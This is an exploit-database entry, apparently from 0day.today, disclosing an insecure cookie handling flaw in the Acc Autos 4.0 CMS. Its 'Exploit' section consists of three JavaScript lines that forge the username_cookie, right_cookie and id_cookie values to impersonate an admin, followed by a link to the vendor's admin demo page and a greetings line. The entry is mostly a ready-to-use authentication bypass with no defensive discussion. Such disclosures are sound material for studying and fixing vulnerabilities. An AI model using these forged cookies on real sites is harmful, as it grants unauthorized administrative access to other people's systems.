id: 4046
date: 11/03/2008
title: Acc Autos 4.0 Insecure Cookie Handling Vulnerability
author: x0r
cves: 

====================================================
Acc Autos 4.0 Insecure Cookie Handling Vulnerability
====================================================


-==========================================-
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug:  Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
-==========================================-
Exploit:

[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";

Live Demo:

http://www.accscripts.com/autos/demo/admin/

Greetz: 8\10\2008..Il Sogni Diventa Realta...Bimb4 Ti AmO.



#  0day.today [2023-03-23]  #